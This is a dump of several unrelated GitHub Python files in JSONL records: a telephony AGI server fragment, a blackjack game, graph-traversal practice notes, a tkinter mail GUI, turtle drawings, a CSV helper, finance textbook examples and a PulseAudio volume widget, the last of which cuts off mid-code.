args)\n finally:\n self.lock.release()\n\n\ndef register(handle_fn: HandleFunction, setup_fn: SetupFunction | None = None) -> None:\n handler_name = handle_fn.__name__\n\n if handler_name in _handlers:\n raise ValueError(\"handler %r already registered\", handler_name)\n\n _handlers[handler_name] = Handler(handler_name, setup_fn, handle_fn)\n\n\ndef sighup_handle(signum: int, frame: FrameType | None) -> None:\n logger.debug(\"reloading core engine\")\n _server.setup()\n\n logger.debug(\"reloading handlers\")\n with _server.database.connection() as conn:\n with _server.database.transaction(conn) as cursor:\n for handler in _handlers.values():\n handler.reload(cursor)\n logger.debug(\"finished reload\")\n\n\ndef run() -> None:\n logger.debug(\"list of handlers: %s\", ', '.join(sorted(_handlers)))\n with _server.database.connection() as conn:\n with _server.database.transaction(conn) as cursor:\n for handler in _handlers.values():\n handler.setup(cursor)\n\n _server.serve_forever()\n\n\ndef init(config) -> None:\n global _server\n _server = AGID(config)\n","repo_name":"wazo-platform/wazo-agid","sub_path":"wazo_agid/agid.py","file_name":"agid.py","file_ext":"py","file_size_in_byte":7621,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5344103276","text":"# master\n# master\n# BLACK JACK - CASINO A GAME OF FORTUNE!!!\nfrom time import *\n\n# BLACK JACK - CASINO\n# PYTHON CODE BASE\n\n\n# master\nimport random\n\ndeck = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 10, 10, 10, 11] * 4\n\nrandom.shuffle(deck)\n\nprint(f'{\"*\"*58} \\n Welcome to Jeffs BlackJack \\n{\"*\"*58}')\nsleep(2)\nprint(\"So you think you have what it takes to beat my AI?\")\nsleep(2)\nprint(\"I suppose you can give it a try..\")\nsleep(2)\nprint(\"Don't beat yourself up if you lose\")\nsleep(2)\nprint(\"Loading---\")\nsleep(2)\nprint(\"It's just a game..\")\nsleep(2)\nprint(\n \"Lets give this a try \\n Dealing cards now..\"\n)\nsleep(2)\nd_cards = [] # Initializing dealer's cards\np_cards = [] # Initializing player's cards\nsleep(2)\nwhile len(d_cards) != 2:\n random.shuffle(deck)\n d_cards.append(deck.pop())\n if len(d_cards) == 2:\n print(\"The dealer has one card down and \", d_cards[1])\n\n# Displaying the Player's cards\nwhile len(p_cards) != 2:\n random.shuffle(deck)\n p_cards.append(deck.pop())\n if len(p_cards) == 2:\n print(\"The total of player is \", sum(p_cards))\n print(\"The cards Player has are \", p_cards)\n\nif sum(p_cards) > 21:\n print(f\"You are BUSTED !\\n {'*'*14}Dealer Wins !!{'*'*14}\\n\")\n exit()\n\nif sum(d_cards) > 21:\n print(f\"Dealer is BUSTED !\\n {'*'*14} You are the Winner !!{'*'*18}\\n\")\n exit()\n\nif sum(d_cards) == 21:\n print(f\"{'*'*24}Dealer is the Winner !!{'*'*14}\")\n exit()\n\nif sum(d_cards) == 21 and sum(p_cards) == 21:\n print(f\"{'*'*17}The match is tie !!{'*'*25}\")\n exit()\n\n\n# function to show the dealer's choice\ndef dealer_choice():\n if sum(d_cards) < 17:\n while sum(d_cards) < 17:\n random.shuffle(deck)\n d_cards.append(deck.pop())\n\n print(\"Dealer has total \" + str(sum(d_cards)) + \"with the cards \", d_cards)\n\n if sum(p_cards) == sum(d_cards):\n print(f\"{'*'*15}The match is tie !!{'*'*15}\")\n exit()\n\n if sum(d_cards) == 21:\n if sum(p_cards) < 21:\n print(f\"{'*'*23}Dealer is the Winner !!{'*'*18}\")\n elif sum(p_cards) == 21:\n print(f\"{'*'*20}There is tie !!{'*'*26}\")\n else:\n print(f\"{'*'*23}Dealer is the Winner !!{'*'*18}\")\n\n elif sum(d_cards) < 21:\n if sum(p_cards) < 21 and sum(p_cards) < sum(d_cards):\n print(f\"{'*'*23}Dealer is the Winner !!{'*'*18}\")\n if sum(p_cards) == 21:\n print(f\"{'*'*22}Player is winner !!{'*'*22}\")\n if 21 > sum(p_cards) > sum(d_cards):\n print(f\"{'*'*22}Player is winner !!{'*'*22}\")\n\n else:\n if sum(p_cards) < 21:\n print(f\"{'*'*22}Player is winner !!{'*'*22}\")\n elif sum(p_cards) == 21:\n print(f\"{'*'*22}Player is winner !!{'*'*22}\")\n else:\n print(f\"{'*'*23}Dealer is the Winner !!{'*'*18}\")\n\n\nwhile sum(p_cards) < 21:\n\n # to continue the game again and again !!\n k = input(\"Want to hit or stay?\\n Press 1 for hit and 0 for stay \")\n if k == 1:\n random.shuffle(deck)\n p_cards.append(deck.pop())\n print(\"You have a total of \" + str(sum(p_cards)) + \" with the cards \", p_cards)\n if sum(p_cards) > 21:\n print(f'{\"*\"*13}You are BUSTED !{\"*\"*13}\\n Dealer Wins !!')\n if sum(p_cards) == 21:\n print(f'{\"*\"*19}You are the Winner !!{\"*\"*29}')\n\n else:\n dealer_choice()\n break","repo_name":"jeffoney/PYTHON","sub_path":"blackjack/blackjack.py","file_name":"blackjack.py","file_ext":"py","file_size_in_byte":3361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31002536465","text":"# create dfs spannning tree\n# find articulation points\n# remove articulation points\n# how biconnected components in a graph\n\n# find dfn and low for each vertex, dfn = {}, low = {}\n# verify two biconnected comonet of a same grah have no more than 1 edge in common\n\n# what is biartite grah?\n# comletye grajhj with n vertices, show thatthe number of sanning tree is atlleast 2^n-1 - 1\n\n# proerties\n\n\n# connected_undirected_graph\n# use mocks\n\n# spanning tree of the abve graph\n\n\"\"\"\ninput =\n A\n / | \\\n B C D\n / \\ /\n E F G\n / \\ \\\n H I J\n\noutput DFS = A, B, E, F ,H, I, C, D, G, J\noutput BFS = A, B, C, D, E , F, G, H, I, J\n\nexercise : find where to BFS\n\"\"\"\n\n\nclass Vertex(object):\n def __init__(self, name):\n self.children = []\n self.name = name\n\n def addChild(self, name):\n self.children.append(Vertex(name))\n return self\n\n\nA = Vertex(\"A\")\nB = Vertex(\"B\")\nC = Vertex(\"C\")\nD = Vertex(\"D\")\nE = Vertex(\"E\")\nF = Vertex(\"F\")\nG = Vertex(\"G\")\nH = Vertex(\"H\")\nI = Vertex(\"I\")\nJ = Vertex(\"J\")\n\nA.addChild(\"B\")\nA.addChild(\"C\")\nA.addChild(\"D\")\n\n# B\nA.children[0].addChild(\"E\")\nA.children[0].addChild(\"F\")\n\n# D\nA.children[2].addChild(\"G\")\n\n# F\nA.children[0].children[1].addChild(\"H\")\nA.children[0].children[1].addChild(\"I\")\n\n# G\nA.children[2].children[0].addChild(\"J\")\n\n\ndef dfs_recursive(root, arr=[]):\n # print(\"node,\", root.name)\n arr.append(root.name)\n for child in root.children:\n dfs_recursive(child, arr=arr)\n return arr\n\n\ndef bfs(root, arr=[]):\n childs = root.children\n arr.append(root.name)\n while childs:\n next_ = childs.pop(0)\n arr.append(next_.name)\n if next_.children:\n childs.extend(next_.children)\n return arr\n\n\ndef bfs_recursive(root, arr=[], childs=[]):\n arr.append(root.name)\n if root.children:\n childs.extend(root.children)\n if childs:\n bfs_recursive(childs.pop(0), arr, childs)\n return arr\n\n\n\"\"\"\nvertex - n \ne - n-1\n \ninput graph = \n\n 0\n / | \n 1 ---- 2 \n / | |\n3 - 4 ----- \n\noutput DFS = 0, 1, 3, 4, 2\noutput BFS = 0, 1, 3,4\n\"\"\"\n\n#\n# graph = {'0': set(['1', '2']),\n# '1': set(['0', '3', '4']),\n# '2': set(['0']),\n# '3': set(['1']),\n# '4': set(['2', '3'])}\n\ngraph = {'0': ['1', '2'],\n '1': ['0', '3', '4'],\n '2': ['0'],\n '3': ['1'],\n '4': ['2', '3']}\n\nvisited = {str(i): False for i in range(5)}\n\n\n# DFS algorithm\ndef dfs_connected_undirected(start):\n print(start)\n visited[start] = True\n for next in graph[start]:\n if not visited[next]:\n dfs_connected_undirected(next)\n return visited\n\n\n# \"\"\"\n# input graph =\n# 0 (1 - 1)\n# / |\n# (2 - ) 1 ---- 2 (5)\n# / | |\n# (3 - ) 3 - 4 ----\n# (4 - )\n# output =\n#\n# \"\"\"\n\nvisited = {str(i): False for i in range(5)}\ndfn = {str(i): -1 for i in range(5)}\nlow = {str(i): -1 for i in range(5)}\n\n\ndef dfn_and_low(start, parent, idx=-1):\n \"\"\"\n dfn[i] just num++\n low = min\n \"\"\"\n print(start)\n visited[start] = True\n\n dfn[start] = idx + 1\n low[start] = idx + 1\n\n for next in graph[start]:\n if not visited[next]:\n dfn_and_low(next, start, idx + 1)\n low[start] = min(low[start], low[next])\n else:\n if next != parent:\n low[start] = min(low[start], dfn[next])\n\n\nif __name__ == '__main__':\n # theory\n # nolinear DS\n # A Graph is a non-linear data structure consisting of nodes and edges. The nodes are sometimes also referred to as vertices and the edges are lines or arcs that connect any two nodes in the graph. More formally a Graph can be defined as,\n # runtimes\n # time ->O(v+e)\n # space -> O(e) # explain how\n\n # arr = dfs_recursive(A)\n # print(arr)\n # arr = bfs_recursive(A)\n # print(arr)\n # arr = bfs(A)\n # print(arr)\n # **********************#\n\n # dfs_connected_undirected('0')\n # ***\n\n dfn_and_low('0', '-1')\n print(dfn)\n print(low)\n\n#\n# Why this class - value added purpose for this group\n# I have started this and I don't want waste your time and go empty handed\n#\n# Take aways\n# Basic idea on graph\n# whats next?\n# references and relevant graph problems to practice\n\n# process and plan to prepare for the interview on FANG(experimental and not proved)\n\n# Why are processes important? They are important because they describe\n# how things are done and then provides the focus for making them better\n# and how they are done determines how successful the outcomes will be.\n# If you focus on the right processes, in the right way, you can design your way to success.\n\n#\n\n\n# Discussiing ideas if any\n# polls in slack\n# 30 | 30\n# check the problems sheet\n","repo_name":"Siva-Karthi/ProblemSolvingPractice","sub_path":"Interviews/Amazon/graphs_rough.py","file_name":"graphs_rough.py","file_ext":"py","file_size_in_byte":4840,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"40834556404","text":"import pathlib\nimport pygubu\nimport tkinter as tk\nimport tkinter.ttk as ttk\n\nPROJECT_PATH = pathlib.Path(__file__).parent\nPROJECT_UI = PROJECT_PATH / \"send_mail.ui\"\n\n\nclass SendMail:\n def __init__(self, master=None):\n # build ui\n self.main_frame = tk.Frame(master)\n self.blue_frame = tk.Frame(self.main_frame)\n self.mai_image_send = tk.Label(self.blue_frame)\n self.img_mail_send = tk.PhotoImage(file='/home/garuda/Desktop/project/message_manage/assets/images/mail_send.png')\n self.mai_image_send.configure(image=self.img_mail_send, text='label1')\n self.mai_image_send.place(anchor='nw', relx='0.08', rely='0.35', x='0', y='0')\n self.sm_label_send = ttk.Label(self.blue_frame)\n self.sm_label_send.configure(background='#10e396', font='{avro} 14 {bold italic}', text='Send Mail')\n self.sm_label_send.place(anchor='nw', relx='0.25', rely='0.15', x='0', y='0')\n self.blue_frame.configure(background='#10e396', height='500', width='300')\n self.blue_frame.place(anchor='nw', x='0', y='0')\n self.mail_sub_label_send = ttk.Label(self.main_frame)\n self.mail_sub_label_send.configure(background='#cafae6', font='{avro} 12 {italic}', text='Mail Subject')\n self.mail_sub_label_send.place(anchor='nw', relx='0.4', rely='0.15', x='0', y='0')\n self.subject_entry_send = ttk.Entry(self.main_frame)\n self.subject_entry_send.configure(font='{avro} 12 {italic}')\n self.subject_entry_send.place(anchor='nw', relx='0.6', rely='0.15', x='0', y='0')\n self.body_label_send = tk.Label(self.main_frame)\n self.body_label_send.configure(background='#cafae6', font='{avro} 12 {italic}', text='Mail Body')\n self.body_label_send.place(anchor='nw', relx='0.4', rely='0.25', x='0', y='0')\n self.body_text_send = tk.Text(self.main_frame)\n self.body_text_send.configure(height='10', width='50')\n self.body_text_send.place(anchor='nw', relx='0.4', rely='0.3', width='365', x='0', y='0')\n self.list_erp_label_send = tk.Label(self.main_frame)\n self.list_erp_label_send.configure(background='#cafae6', font='{avro} 12 {italic}', text='List of ERP')\n self.list_erp_label_send.place(anchor='nw', relx='0.4', rely='0.65', x='0', y='0')\n self.seperate_label_send = tk.Label(self.main_frame)\n self.seperate_label_send.configure(background='#cafae6', text='(separated by , )')\n self.seperate_label_send.place(anchor='nw', relx='0.51', rely='0.65', x='0', y='0')\n self.erp_text_send = tk.Text(self.main_frame)\n self.erp_text_send.configure(height='10', width='50')\n self.erp_text_send.place(anchor='nw', height='75', relx='0.4', rely='0.7', width='365', x='0', y='0')\n self.all_checkbutton_send = tk.Checkbutton(self.main_frame)\n self.all_checkbutton_send.configure(background='#cafae6', font='{avro} 12 {}', text=' All')\n self.all_checkbutton_send.place(anchor='nw', relx='0.4', rely='0.85', x='0', y='0')\n self.all_checkbutton_send.configure(command=self.all_mail)\n self.cm_label_send = tk.Label(self.main_frame)\n self.cm_label_send.configure(background='#cafae6', font='{avro} 14 {bold italic}', text='Compose Mail')\n self.cm_label_send.place(anchor='nw', relx='0.4', rely='0.04', x='0', y='0')\n self.send_send = tk.Button(self.main_frame)\n self.img_send = tk.PhotoImage(file='/home/garuda/Desktop/project/message_manage/assets/images/send.png')\n self.send_send.configure(activebackground='#cafae6', background='#cafae6', borderwidth='0', highlightthickness='0')\n self.send_send.configure(image=self.img_send, text='button3')\n self.send_send.place(anchor='nw', relx='0.86', rely='0.9', x='0', y='0')\n self.send_send.configure(command=self.send_mail)\n self.main_frame.configure(background='#cafae6', borderwidth='0', height='500', highlightbackground='#cafae6')\n self.main_frame.configure(highlightcolor='#cafae6', highlightthickness='0', width='800')\n self.main_frame.pack(expand='false', side='top')\n self.main_frame.pack_propagate(0)\n\n # Main widget\n self.mainwindow = self.main_frame\n \n def run(self):\n self.mainwindow.mainloop()\n\n def all_mail(self):\n pass\n\n def send_mail(self):\n pass\n\n\nif __name__ == '__main__':\n root = tk.Tk()\n root.title('Send Mail')\n root.resizable(height=False,width=False)\n app = SendMail(root)\n app.run()\n\n","repo_name":"lokie861/Message-Management-System","sub_path":"modules/sendmail.py","file_name":"sendmail.py","file_ext":"py","file_size_in_byte":4509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28502735603","text":"from turtle import *\nspeed(0) # максимально быстрая отрисовка\nbgcolor(\"black\")\nhideturtle()\n# FUNCTIONS-FUNCTIONS-FUNCTIONS-FUNCTIONS-FUNCTIONS-FUNCTIONS-FUNCTIONS\ndef go_to(x, y):\n \"\"\"\n Черепаха поднимает перо;\n перемещается в координаты x, y;\n опускает перо.\n \"\"\"\n penup()\n goto(x, y)\n pendown()\n\ndef rectangle(w, h):\n \"\"\"\n отрисовка прямоугольника длиной w и высотой h\n \"\"\"\n\n forward(w)\n right(90)\n forward(h)\n right(90)\n forward(w)\n right(90)\n forward(h)\n right(90)\n\ndef filled_rectangle(w, h, fill_color):\n \"\"\"\n отрисовка прямоугольника длиной w и высотой h,\n закрашенного цветом fill_color\n \"\"\"\n fillcolor(fill_color);\n begin_fill()\n rectangle(w, h)\n end_fill()\n\ndef square(a):\n \"\"\"\n рисует квадрат со стороной a\n \"\"\"\n rectangle(a, a)\n\ndef fill_square(a, color):\n \"\"\"\n рисует квадрат со стороной a и цветом color\n \"\"\"\n fillcolor(color);\n begin_fill()\n square(a)\n end_fill()\n\n# END FUNCTIONS-END FUNCTIONS-END FUNCTIONS-END FUNCTIONS-END FUNCTIONS\n\ngo_to(-300, -200)\n\n# РИСУЕМ КВАДРАТ\npensize(3)\npencolor(\"yellow\")\nfill_square(100, \"#250379\")\ngo_to(-180, -100)\npencolor(\"#aaffff\")\nfill_square(200, \"#affa00\")\ngo_to(40, 0)\npencolor(\"yellow\")\nfill_square(300, \"#5050ff\")\n\ngo_to(-300, 200)\npencolor(\"red\")\nfilled_rectangle(640, 180, \"#00ff00\")\n\ngo_to(-300, 0)\npencolor('purple')\nrectangle(320, 80)\n\ngo_to(-300, -100)\npencolor('#0000ff')\nrectangle(100, 80)\nheading(\"false\")\n","repo_name":"slutsk/turtle","sub_path":"pr002.py","file_name":"pr002.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12453813622","text":"# -*- coding:utf-8 -*-\n# Author: Lu Liwen\n# Modified Time: 2019-12-08\n\n\"\"\"\n固定格式的csv文件读取操作\n\n\"\"\"\nimport csv\nimport numpy as np\n\n\n# 读取固定的csv样本数据\ndef csvRead(usage, type):\n \"\"\"\n\n :param usage:train or test\n :param type: label or name\n :return:\n \"\"\"\n data = []\n path = './result/data/' + str(usage) + 'file' + '_' + str(type) + '.csv'\n f = open(path, 'r')\n csv_reader = csv.reader(f)\n for line in csv_reader:\n if type == 'label':\n data.append(line)\n elif type == 'name':\n data.append(line[1])\n return data\n\n\ndef str2float(datastr):\n m, n = np.shape(datastr)\n datafloat = np.zeros((m, n))\n for i in range(m):\n for j in range(n):\n try:\n datafloat[i][j] = float(datastr[i][j].rstrip()) # 数组遍历实现转换\n except:\n print('为0位置在于%d行%d列' % (i + 1, j + 1))\n datafloat[i][j] = 0.0\n\n return datafloat\n","repo_name":"hellollw/Tensorflow_Texture_Detect","sub_path":"CNN之前版本代码结构参考/CsvFunction.py","file_name":"CsvFunction.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31313817947","text":"import sys, pdb\nsys.path.append('/usr/share/doc')\nsys.path.append(\"/usr/lib/python3/dist-packages\")\nsys.path.append(\"/usr/local/lib/python3.4/dist-packages\")\nsys.path.append(\"/usr/local/lib/python2.7/dist-packages\")\nimport matplotlib as mpl\nmpl.use('Agg')\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns; sns.set()\nimport matplotlib as mpl\nmpl.rcParams['font.family'] = 'serif'\nimport traits.api as trapi\nimport traitsui.api as trui\n\nPATH = '/home/ubuntu/workspace/python_for_finance/png/book_examples/ch13/'\n\ndef multiplication(self):\n return self.a * self.b\n \nclass sorted_list(object):\n def __init__(self, elements):\n self.elements = sorted(elements) # sorted list object\n def __iter__(self):\n self.position = -1\n return self\n def __next__(self):\n if self.position == len(self.elements) - 1:\n raise StopIteration\n self.position += 1\n return self.elements[self.position]\n\nclass ExampleOne(object):\n pass\n\nclass ExampleTwo(object):\n def __init__(self, a, b):\n self.a = a\n self.b = b\n\nclass ExampleThree(object):\n def __init__(self, a, b):\n self.a = a\n self.b = b\n def addition(self):\n return self.a + self.b\n\nclass ExampleFour(ExampleTwo):\n def addition(self):\n return self.a + self.b\n\nclass ExampleFive(ExampleFour):\n def multiplication(self):\n return self.a * self.b\n\nclass ExampleSix(ExampleFour):\n multiplication = multiplication\n\nclass ExampleSeven(object):\n def __init__(self, a, b):\n self.a = a\n self.b = b\n self.__sum = a + b\n multiplication = multiplication\n def addition(self):\n return self.__sum\n\ndef object_orientation():\n c = ExampleOne()\n print(c.__str__())\n print(type(c))\n\n c = ExampleTwo(1, 'text')\n print(c.a)\n print(c.b)\n c.a = 100\n print(c.a)\n c = ExampleOne()\n c.first_name = 'Jason'\n c.last_name = 'Bourne'\n c.movies = 4\n print(c.first_name, c.last_name, c.movies)\n\n c = ExampleThree(10, 15)\n print(c.addition())\n c.a += 10\n print(c.addition())\n\n c = ExampleFour(10, 15)\n print(c.addition())\n\n c = ExampleFive(10, 15)\n print(c.addition())\n print(c.multiplication())\n\n c = ExampleSix(10, 15)\n print(c.addition())\n print(c.multiplication())\n\n c = ExampleSeven(10, 15)\n print(c.addition())\n print(c._ExampleSeven__sum)\n c.a += 10\n print(c.a)\n print(c.addition())\n print(c._ExampleSeven__sum)\n print(c.multiplication())\n name_list = ['Sandra', 'Lilli', 'Guido', 'Zorro', 'Henry']\n for name in name_list:\n print(name)\n\n sorted_name_list = sorted_list(name_list)\n for name in sorted_name_list:\n print(name)\n\n print(type(sorted(name_list)))\n for name in sorted(name_list):\n print(name)\n\n print(type(sorted_name_list))\n \ndef discount_factor(r, t):\n ''' Function to calculate a discount factor.\n \n Parameters\n ==========\n r : float\n positive, constant short rate\n t : float, array of floats\n future date(s), in fraction of years;\n e.g. 0.5 means half a year from now\n \n Returns\n =======\n df : float\n discount factor\n '''\n df = np.exp(-r * t)\n # use of NumPy universal function for vectorization\n return df\n \nclass short_rate(object):\n ''' Class to model a constant short rate object.\n \n Parameters\n ==========\n name : string\n name of the object\n rate : float\n positive, constant short rate\n \n Methods\n =======\n get_discount_factors :\n returns discount factors for given list/array\n of dates/times (as year fractions)\n '''\n def __init__(self, name, rate):\n self.name = name\n self.rate = rate\n def get_discount_factors(self, time_list):\n ''' time_list : list/array-like '''\n time_list = np.array(time_list)\n return np.exp(-self.rate * time_list)\n \nclass cash_flow_series(object):\n ''' Class to model a cash flows series.\n \n Attributes\n ==========\n name : string\n name of the object\n time_list : list/array-like\n list of (positive) year fractions\n cash_flows : list/array-like\n corresponding list of cash flow values\n short_rate : instance of short_rate class\n short rate object used for discounting\n \n Methods\n =======\n present_value_list :\n returns an array with present values\n net_present_value :\n returns NPV for cash flow series\n '''\n def __init__(self, name, time_list, cash_flows, short_rate):\n self.name = name\n self.time_list = time_list\n self.cash_flows = cash_flows\n self.short_rate = short_rate\n def present_value_list(self):\n df = self.short_rate.get_discount_factors(self.time_list)\n return np.array(self.cash_flows) * df\n def net_present_value(self):\n return np.sum(self.present_value_list())\n\nclass cfs_sensitivity(cash_flow_series):\n def npv_sensitivity(self, short_rates):\n npvs = []\n for rate in short_rates:\n self.short_rate = short_rate('r', rate)\n npvs.append(self.net_present_value())\n return np.array(npvs)\n\ndef short_rate_class():\n t = np.linspace(0, 5)\n for r in [0.01, 0.05, 0.1]:\n plt.plot(t, discount_factor(r, t), label='r=%4.2f' % r, lw=1.5)\n plt.xlabel('years')\n plt.ylabel('discount factor')\n plt.grid(True)\n plt.legend(loc=0)\n plt.savefig(PATH + 'short_rate.png', dpi=300)\n plt.close()\n \n sr = short_rate('r', 0.05)\n print(sr.name, sr.rate)\n \n time_list = [0.0, 0.5, 1.0, 1.25, 1.75, 2.0] # in year fractions\n print(sr.get_discount_factors(time_list))\n \n for r in [0.025, 0.05, 0.1, 0.15]:\n sr.rate = r\n plt.plot(t, sr.get_discount_factors(t),\n label='r=%4.2f' % sr.rate, lw=1.5)\n plt.xlabel('years')\n plt.ylabel('discount factor')\n plt.grid(True)\n plt.legend(loc=0)\n plt.savefig(PATH + 'short_rate2.png', dpi=300)\n plt.close()\n\n sr.rate = 0.05\n cash_flows = np.array([-100, 50, 75])\n time_list = [0.0, 1.0, 2.0]\n disc_facts = sr.get_discount_factors(time_list)\n print(disc_facts)\n print(disc_facts * cash_flows)\n print(np.sum(disc_facts * cash_flows))\n sr.rate = 0.15\n print(np.sum(sr.get_discount_factors(time_list) * cash_flows))\n\n sr.rate = 0.05\n cfs = cash_flow_series('cfs', time_list, cash_flows, sr)\n print(cfs.cash_flows)\n print(cfs.time_list)\n print(cfs.present_value_list())\n print(cfs.net_present_value())\n\n pdb.set_trace()\n cfs_sens = cfs_sensitivity('cfs', time_list, cash_flows, sr)\n short_rates = [0.01, 0.025, 0.05, 0.075, 0.1, 0.125, 0.15, 0.2]\n npvs = cfs_sens.npv_sensitivity(short_rates)\n print(npvs)\n plt.plot(short_rates, npvs, 'b')\n plt.plot(short_rates, npvs, 'ro')\n plt.plot((0, max(short_rates)), (0, 0), 'r', lw=2)\n plt.grid(True)\n plt.xlabel('short rate')\n plt.ylabel('net present value')\n plt.savefig(PATH + 'cash_flow.png', dpi=300)\n plt.close()\n\nclass short_rate_g(trapi.HasTraits):\n name = trapi.Str\n rate = trapi.Float\n time_list = trapi.Array(dtype=np.float, shape=(1,5))\n disc_list = trapi.Array(dtype=np.float, shape=(1,5))\n update = trapi.Button\n \n def _update_fired(self):\n self.disc_list = np.exp(-self.rate * self.time_list)\n v = trui.View(trui.Group(trui.Item(name='name'),\n trui.Item(name='rate'),\n trui.Item(name='time_list', label = 'Insert Time List Here'),\n trui.Item(name='update', show_label=False),\n trui.Item(name='disc_list', label='Press Update for Factors'),\n show_border=True, label='Calculate Discount Factors'),\n buttons = [trui.OKButton, trui.CancelButton],\n resizable = True)\n \n def get_discount_factors(self):\n return np.exp(-self.rate * self.time_list)\n \nclass cash_flow_series_g(trapi.HasTraits):\n name = trapi.Str\n short_rate = trapi.Range(0.0, 0.5, 0.05)\n time_list = trapi.Array(dtype=np.float, shape=(1,6))\n present_values = trapi.Array(dtype=np.float, shape=(1,6))\n cash_flows = trapi.Array(dtype=np.float, shape=(1,6))\n disc_values = trapi.Array(dtype=np.float, shape=(1,6))\n net_present_value = trapi.Float\n update = trapi.Button\n \n def _update_fired(self):\n self.disc_values = np.exp(-self.rate * self.time_list)\n self.present_values = self.disc_values * self.cash_flows\n self.net_present_value = np.sum(self.present_values)\n v = trui.View(trui.Group(trui.Item(name='name'),\n trui.Item(name='short_rate'),\n trui.Item(name='time_list', label = 'Time List'),\n trui.Item(name='cash_flows', label = 'Cash Flows'),\n trui.Item(name='update', show_label=False),\n trui.Item(name='disc_values', label='Discount Factors'),\n trui.Item(name='present_values', label='Present Values'),\n trui.Item(name='net_present_value', label='Net Present Value'),\n show_border=True, label='Calculate Present Values'),\n buttons = [trui.OKButton, trui.CancelButton],\n resizable = True)\n \n def get_discount_factors(self):\n return np.exp(-self.rate * self.time_list)\n \n\ndef short_rate_gui():\n sr = short_rate_g()\n sr.configure_traits()\n sr.name = 'sr_class'\n sr.rate = 0.05\n sr.time_list = [0.0, 0.5, 1.0, 1.5, 2.0]\n print(sr.rate)\n print(sr.time_list)\n print(sr.get_discount_factors())\n sr._update_fired()\n\n\nif __name__ == \"__main__\":\n # object_orientation()\n short_rate_class()\n # Not compatible for Python3\n # short_rate_gui()","repo_name":"mccarvik/python_for_finance","sub_path":"books/python_for_finance_book/ch_scraps/13ch_scrap.py","file_name":"13ch_scrap.py","file_ext":"py","file_size_in_byte":9938,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"10376342823","text":"from gi.repository import Gtk, Gdk, Keybinder\nimport os\nimport dbus\nimport util\n\n__all__ = [\"Volume\"]\n\nPROPS = \"org.freedesktop.DBus.Properties\"\n\nimport ctypes\nDLL = ctypes.CDLL(\"libpulse.so.0\")\nvolume_to_db = DLL.pa_sw_volume_to_dB\nvolume_to_db.argtypes = (ctypes.c_uint32,)\nvolume_to_db.restype = ctypes.c_double\nvolume_from_db = DLL.pa_sw_volume_from_dB\nvolume_from_db.argtypes = (ctypes.c_double,)\nvolume_from_db.restype = ctypes.c_uint32\n\nVOLUME_NORM = volume_from_db(0)\nVOLUME_UI_MAX = volume_from_db(11)\n\nLABEL_FORMAT = \"{:+.1f} dB\"\n\ndef pulse_bus_address():\n\tif 'PULSE_DBUS_SERVER' in os.environ:\n\t\taddress = os.environ['PULSE_DBUS_SERVER']\n\telse:\n\t\tbus = dbus.SessionBus()\n\t\tserver_lookup = bus.get_object(\"org.PulseAudio1\", \"/org/pulseaudio/server_lookup1\")\n\t\taddress = server_lookup.Get(\"org.PulseAudio.ServerLookup1\", \"Address\", dbus_interface=PROPS)\n\treturn address\n\nclass Volume(Gtk.EventBox):\n\tdef __init__(self, keys=False, spacing=3):\n\t\tsuper().__init__()\n\n\t\tself.icon = Gtk.Label()\n\t\tself.text = Gtk.Label()\n\t\tbox = Gtk.Box(spacing=spacing)\n\t\tbox.pack_start(self.icon, False, False, 0)\n\t\tbox.pack_start(self.text, False, False, 0)\n\t\tself.add(box)\n\n\t\tself.icon.show()\n\t\tself.text.show()\n\t\tbox.show()\n\t\tself.show()\n\n\t\tself.build_popup()\n\n\t\tself.set_events(Gdk.EventMask.BUTTON_PRESS_MASK)\n\t\tself.connect(\"button-press-event\", self.click)\n\n\t\tself.pulse_bus = dbus.connection.Connection(pulse_bus_address())\n\t\tself.pulse_core = self.pulse_bus.get_object(None, \"/org/pulseaudio/core1\")\n\n\t\tself.pulse_core.ListenForSignal(\"org.PulseAudio.Core1.FallbackSinkUpdated\", [self.pulse_core], dbus_interface=\"org.PulseAudio.Core1\")\n\t\tself.pulse_core.ListenForSignal(\"org.PulseAudio.Core1.FallbackSinkUnset\", [self.pulse_core], dbus_interface=\"org.PulseAudio.Core1\")\n\n\t\tself.default_sink = None\n\t\tself.updateSink(self.pulse_core.Get(\"org.PulseAudio.Core1\", \"FallbackSink\", dbus_interface=PROPS))\n\n\t\tself.pulse_bus.add_signal_receiver(self.updateSink, \"FallbackSinkUpdated\")\n\t\tself.pulse_bus.add_signal_receiver(self.unsetSink, \"FallbackSinkUnset\")\n\t\tself.pulse_bus.add_signal_receiver(self.updateVolume, \"VolumeUpdated\")\n\t\tself.pulse_bus.add_signal_receiver(self.updateMute, \"MuteUpdated\")\n\n\t\tif keys:\n\t\t\tKeybinder.bind(\"AudioMute\", self.toggleMute)\n\t\t\tKeybinder.bind(\"AudioRaiseVolume\", self.changeVolume, +5)\n\t\t\tKeybinder.bind(\"AudioLowerVolume\", self.changeVolume, -5)\n\n\tdef build_popup(self):\n\t\tself.label = Gtk.Label()\n\t\tself.slider = Gtk.Scale()\n\t\tself.slider.set_draw_value(False)\n\t\tself.slider.set_range(0, VOLUME_UI_MAX)\n\t\tself.slider.set_increments(VOLUME_NORM/100, VOLUME_NORM/20)\n\t\tself.slider.add_mark(VOLUME_NORM, Gtk.PositionType.RIGHT, \"\")\n\t\tself.slider.connect(\"change-value\", self.changeSlider)\n\t\tself.button = Gtk.ToolButton()\n\t\tself.button.set_halign(Gtk.Align.CENTER)\n\t\tself.button.connect(\"clicked\", self.toggleMute)\n\n\t\tself.slider.set_orientation(Gtk.Orientation.VERTICAL)\n\t\tself.slider.set_inverted(True)\n\t\tself.slider.set_size_request(0, 150)\n\t\tbox = 